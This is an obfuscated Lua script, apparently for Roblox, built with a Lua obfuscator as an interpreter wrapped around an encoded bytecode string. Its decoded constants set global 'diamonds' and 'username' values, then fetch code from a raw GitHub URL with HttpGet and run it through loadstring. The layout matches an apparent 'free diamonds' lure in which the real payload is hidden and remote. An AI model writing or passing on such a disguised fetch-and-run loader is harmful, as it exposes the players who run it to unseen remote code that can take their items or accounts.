--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v102=v5(v83,v19);v19=nil;return v102;else return v83;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v84=0;local v85;while true do if (v84==(0 -0)) then v85=(v31/(2^(v32-1)))%((5 -3)^(((v33-1) -(v32-((1 + 0) -0))) + (2 -1))) ;return v85-(v85%(620 -(555 + 64))) ;end end else local v86=(933 -(857 + 74))^(v32-((1446 -(282 + 595)) -(367 + (1838 -(1523 + 114))))) ;return (((v31%(v86 + v86))>=v86) and (928 -(193 + 21 + 713))) or (0 + 0) ;end end local function v21()local v34=(0 + 0) -0 ;local v35;while true do if ((1065 -(68 + 222 + 775))==v34) then v35=v1(v16,v18,v18);v18=v18 + ((2228 -(892 + 65)) -(226 + 1044)) ;v34=4 -3 ;end if (v34==(118 -(32 + 85))) then return v35;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (4 -2) );v18=v18 + (3 -1) ;return (v37 * (469 -213)) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (353 -(87 + 263)) );v18=v18 + (184 -(67 + 113)) ;return (v41 * 16777216) + (v40 * (48056 + 17480)) + (v39 * (628 -(274 + 98))) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=3 -2 ;local v45=(v20(v43,953 -(802 + 150) ,53 -33 ) * ((3 -1)^32)) + v42 ;local v46=v20(v43,21,23 + 8 );local v47=((v20(v43,32)==1) and  -(998 -(915 + (261 -179)))) or ((1 + 1) -1) ;if (v46==((0 -0) + 0)) then if (v45==0) then return v47 * (0 -0) ;else local v94=1187 -(1069 + (556 -(145 + 293))) ;while true do if (v94==(0 -(430 -(44 + 386)))) then v46=1 -(1486 -(998 + 488)) ;v44=0 + 0 ;break;end end end elseif (v46==((1156 + 2480) -1589)) then return ((v45==(0 + 0)) and (v47 * ((792 -(368 + 423))/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(1041 -(10 + 8)) ) * (v44 + (v45/((7 -5)^(494 -(416 + 26))))) ;end local function v25(v48)local v49;if  not v48 then local v87=0 + 0 + 0 ;while true do if (v87==(772 -(201 + 571))) then v48=v23();if (v48==(1138 -(116 + 1022))) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -(4 -3) );v18=v18 + v48 ;local v50={};for v65=1, #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0 -0 ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v51~=(0 -0)) then else local v91=405 -(118 + 287) ;while true do if (v91~=(0 -0)) then else v52=241 -(187 + 54) ;v53=nil;v91=781 -(162 + 618) ;end if (v91==(2 -1)) then v51=1;break;end end end if (v51==3) then v58=nil;while true do local v95=0 + 0 ;local v96;local v97;while true do if (v95~=(0 + 0)) then else v96=0;v97=nil;v95=1;end if ((1 -0)==v95) then while true do if (0==v96) then v97=0 -0 ;while true do if (v97==0) then if (v52~=2) then else local v169=0 + 0 ;local v170;while true do if (v169==(1636 -(1373 + 263))) then v170=0;while true do if (v170==(978 -(553 + 424))) then for v184=1001 -(451 + 549) ,v23() do local v185=0 -0 ;local v186;while true do if (v185~=(0 + 0)) then else v186=v21();if (v20(v186,1 + 0 ,1 -0 )~=(0 + 0)) then else local v198=0 -0 ;local v199;local v200;local v201;local v202;local v203;while true do if (0~=v198) then else v199=0 + 0 ;v200=nil;v198=1;end if (v198==(1 + 1)) then v203=nil;while true do if (v199==(0 + 0)) then local v205=1384 -(746 + 638) ;while true do if (v205~=(0 -0)) then else v200=0 -0 ;v201=nil;v205=1 + 0 ;end if (v205==(2 -1)) then v199=1;break;end end end if (v199==(1 + 1)) then while true do if (v200==0) then local v208=0 -0 ;while true do if (v208~=(753 -(239 + 514))) then else v201=v20(v186,2,4 -1 );v202=v20(v186,345 -(218 + 123) ,3 + 3 );v208=1;end if (v208==(1582 -(1535 + 46))) then v200=1;break;end end end if (v200~=(1 + 0)) then else local v209=0 + 0 ;local v210;while true do if (v209~=(0 + 0)) then else v210=0;while true do if (v210==(561 -(306 + 254))) then v200=1 + 1 ;break;end if (v210~=(0 -0)) then else v203={v22(),v22(),nil,nil};if (v201==(731 -(476 + 255))) then local v219=1130 -(369 + 761) ;local v220;local v221;while true do if (v219==(1 + 0)) then while true do if ((0 -0)~=v220) then else v221=603 -(268 + 335) ;while true do if ((290 -(60 + 230))~=v221) then else v203[575 -(426 + 146) ]=v22();v203[1 + 3 ]=v22();break;end end break;end end break;end if (v219~=(0 + 0)) then else local v223=1456 -(282 + 1174) ;while true do if ((812 -(569 + 242))==v223) then v219=2 -1 ;break;end if (v223==(0 + 0)) then v220=0;v221=nil;v223=1025 -(706 + 318) ;end end end end elseif (v201==1) then v203[3]=v23();elseif (v201==2) then v203[3]=v23() -((1253 -(721 + 530))^16) ;elseif (v201==(1274 -(945 + 326))) then local v229=0 + 0 ;local v230;while true do if (v229~=(0 -0)) then else v230=0;while true do if (v230~=(1580 -(1183 + 397))) then else v203[8 -5 ]=v23() -((2 + 0)^16) ;v203[4 + 0 ]=v22();break;end end break;end end end v210=1;end end break;end end end if (v200~=(3 + 0)) then else if (v20(v202,703 -(271 + 429) ,3)==(1 + 0)) then v203[4]=v58[v203[4]];end v53[v184]=v203;break;end if (v200~=(2 + 0)) then else local v212=1500 -(1408 + 92) ;local v213;while true do if (v212==0) then v213=1086 -(461 + 625) ;while true do if (v213~=(1933 -(565 + 1368))) then else local v218=0 -0 ;while true do if (v218~=(1289 -(993 + 295))) then else v213=1 + 0 ;break;end if (v218==0) then if (v20(v202,1,1172 -(418 + 753) )~=(1 -0)) then else v203[2]=v58[v203[1 + 1 ]];end if (v20(v202,2 + 0 ,858 -(564 + 292) )==1) then v203[4 -1 ]=v58[v203[1 + 2 ]];end v218=1 + 0 ;end end end if (v213==1) then v200=3;break;end end break;end end end end break;end if ((1 + 0)==v199) then local v206=0;while true do if (v206~=(530 -(406 + 123))) then else v199=1771 -(1749 + 20) ;break;end if (v206~=(0 + 0)) then else v202=nil;v203=nil;v206=1;end end end end break;end if ((1323 -(1249 + 73))==v198) then v201=nil;v202=nil;v198=1003 -(938 + 63) ;end end end break;end end end v52=2 + 1 ;break;end if (0==v170) then local v182=1125 -(936 + 189) ;while true do if (1==v182) then v170=1146 -(466 + 679) ;break;end if (v182==(0 -0)) then for v189=2 -1 ,v57 do local v190=1900 -(106 + 1794) ;local v191;local v192;local v193;local v194;local v195;while true do if (v190~=0) then else v191=0 + 0 ;v192=nil;v190=1;end if (v190==(1 + 0)) then v193=nil;v194=nil;v190=1140 -(782 + 356) ;end if (v190~=(5 -3)) then else v195=nil;while true do if (v191==0) then local v204=267 -(176 + 91) ;while true do if (v204~=(2 -1)) then else v191=2 -1 ;break;end if (v204==(114 -(4 + 110))) then v192=0;v193=nil;v204=585 -(57 + 527) ;end end end if (v191~=(1428 -(41 + 1386))) then else v194=nil;v195=nil;v191=2;end if (v191~=2) then else while true do if (v192==(0 + 0)) then local v207=0;while true do if (v207==0) then v193=103 -(17 + 86) ;v194=nil;v207=1;end if (1~=v207) then else v192=1 + 0 ;break;end end end if (v192==(1 -0)) then v195=nil;while true do if (v193==(0 -0)) then local v214=0 -0 ;while true do if (v214~=(1 -0)) then else v193=167 -(122 + 44) ;break;end if ((0 -0)~=v214) then else v194=v21();v195=nil;v214=1 + 0 ;end end end if (v193==1) then if (v194==(3 -2)) then v195=v21()~=(0 + 0) ;elseif (v194==(1 + 1)) then v195=v24();elseif (v194~=(5 -2)) then else v195=v25();end v58[v189]=v195;break;end end break;end end break;end end break;end end end v56[3]=v21();v182=66 -(30 + 35) ;end end end end break;end end end if (v52~=0) then else local v171=0 + 0 ;while true do if ((1257 -(1043 + 214))==v171) then v53={};v54={};v171=1;end if (v171==(2 -1)) then v55={};v52=1228 -(322 + 905) ;break;end end end v97=3 -2 ;end if (v97==1) then if (v52==(1215 -(323 + 889))) then local v172=0 -0 ;local v173;while true do if (v172~=(580 -(361 + 219))) then else v173=0;while true do if ((320 -(53 + 267))~=v173) then else local v183=0 + 0 ;while true do if (v183~=(872 -(826 + 46))) then else for v196=414 -(15 + 398) ,v23() do v54[v196-(983 -(18 + 964)) ]=v28();end return v56;end end end end break;end end end if (v52~=1) then else local v174=0 -0 ;local v175;local v176;while true do if (v174~=(0 -0)) then else v175=0 + 0 ;v176=nil;v174=441 -(382 + 58) ;end if (v174==(3 -2)) then while true do if (v175~=(0 + 0)) then else v176=0;while true do if (v176~=(0 -0)) then else local v188=0 -0 ;while true do if ((0 + 0)==v188) then v56={v53,v54,nil,v55};v57=v23();v188=1;end if (v188==(851 -(20 + 830))) then v176=1 + 0 ;break;end end end if (v176==(127 -(116 + 10))) then v58={};v52=1 + 1 ;break;end end break;end end break;end end end break;end end break;end end break;end end end break;end if (v51==(740 -(542 + 196))) then v56=nil;v57=nil;v51=1693 -(1121 + 569) ;end if (v51~=(1 -0)) then else local v92=0 + 0 ;local v93;while true do if (v92==(0 + 0)) then v93=0 + 0 ;while true do if (v93~=(0 -0)) then else v54=nil;v55=nil;v93=1;end if (v93~=(1 -0)) then else v51=767 -(468 + 297) ;break;end end break;end end end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v67=v62;local v68=v63;local v69=v64;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v88=0,v75 do if (v88>=v69) then v73[v88-v69 ]=v74[v88 + 1 ];else v77[v88]=v74[v88 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=6) then if (v80<=2) then if (v80<=0) then if ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v61;else v77[v79[2]]=v61[v79[3]];end elseif (v80>1) then v77[v79[2]]();else local v114=0;local v115;while true do if (v114==0) then v115=v79[2];v77[v115]=v77[v115]();break;end end end elseif (v80<=4) then if (v80==3) then local v116=v79[2];v77[v116]=v77[v116](v13(v77,v116 + 1 ,v72));else local v118=v79[2];local v119,v120=v70(v77[v118](v13(v77,v118 + 1 ,v79[3])));v72=(v120 + v118) -1 ;local v121=0;for v139=v118,v72 do v121=v121 + 1 ;v77[v139]=v119[v121];end end elseif (v80>5) then v77[v79[2]][v79[3]]=v79[4];else do return;end end elseif (v80<=9) then if (v80<=7) then local v103;v103=v79[2];v77[v103]=v77[v103]();v71=v71 + 1 ;v79=v67[v71];v77[v79[2]][v79[3]]=v79[4];v71=v71 + 1 ;v79=v67[v71];if ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v61;else v77[v79[2]]=v61[v79[3]];end v71=v71 + 1 ;v79=v67[v71];v103=v79[2];v77[v103]=v77[v103]();v71=v71 + 1 ;v79=v67[v71];v77[v79[2]][v79[3]]=v79[4];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v71=v79[3];elseif (v80==8) then for v142=v79[2],v79[3] do v77[v142]=nil;end else v71=v79[3];end elseif (v80<=11) then if (v80==10) then v77[v79[2]]=v79[3];else local v130=0;local v131;local v132;while true do if (v130==0) then v131=v79[2];v132=v77[v79[3]];v130=1;end if (v130==1) then v77[v131 + 1 ]=v132;v77[v131]=v132[v79[4]];break;end end end elseif (v80>12) then local v133=0;local v134;local v135;local v136;local v137;local v138;while true do if (v133==2) then v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v138=v79[2];v135,v136=v70(v77[v138](v13(v77,v138 + 1 ,v79[3])));v133=3;end if (v133==0) then v134=nil;v135,v136=nil;v137=nil;v138=nil;if ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v61;else v77[v79[2]]=v61[v79[3]];end v71=v71 + 1 ;v133=1;end if (v133==4) then v77[v138]=v77[v138](v13(v77,v138 + 1 ,v72));v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]();v71=v71 + 1 ;v79=v67[v71];v133=5;end if (v133==1) then v79=v67[v71];v138=v79[2];v137=v77[v79[3]];v77[v138 + 1 ]=v137;v77[v138]=v137[v79[4]];v71=v71 + 1 ;v133=2;end if (v133==5) then v71=v79[3];break;end if (v133==3) then v72=(v136 + v138) -1 ;v134=0;for v167=v138,v72 do local v168=0;while true do if (v168==0) then v134=v134 + 1 ;v77[v167]=v135[v134];break;end end end v71=v71 + 1 ;v79=v67[v71];v138=v79[2];v133=4;end end elseif (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403533O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F706970697069706970696132332F64617A6F7368646E6177627672627473796875646A696B776173642F6D61696E2F313603073O0067657467656E7603083O006469616D6F6E6473024O0080842E4103083O00757365726E616D65030D3O0070657470657467656D322O303100243O00120A3O00014O0008000100013O00260C3O0002000100010004093O0002000100120A000100013O00260C0001000F000100020004093O000F000100122O000200033O00120D000300043O00202O00030003000500122O000500066O000300056O00023O00024O00020001000100044O0023000100260C00010005000100010004093O0005000100120A000200013O00260C00020016000100020004093O0016000100120A000100023O0004093O0005000100260C00020012000100010004093O0012000100122O000300074O000700030001000200302O00030008000900122O000300076O00030001000200302O0003000A000B00122O000200023O00044O001200010004093O000500010004093O002300010004093O000200012O00053O00017O00",v9(),...);
